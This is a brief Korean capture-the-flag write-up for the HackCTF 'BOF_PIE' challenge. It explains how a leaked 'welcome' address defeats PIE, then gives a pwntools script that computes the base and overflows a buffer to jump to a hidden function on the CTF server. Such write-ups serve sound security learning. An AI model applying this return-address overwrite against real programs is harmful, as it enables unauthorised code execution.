HackCTF - BOF_PIE

pie 가 걸려있다

welcome 주소를 출력하기 때문에 pie_base를 구할 수 있고

 

pie_base + j0n9hyun을 해서 주소를 구한 후 

 

더미 + (pie_base + j0n9hyun) 해서 전달하면 된다

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3008)
e = ELF('bof_pie')

r.recvuntil('is ')
pie_base = int(r.recv(10), 16)-e.sym['welcome']

payload = 'A'*22
payload += p32(pie_base+e.sym['j0n9hyun'])

r.sendline(payload)

r.interactive()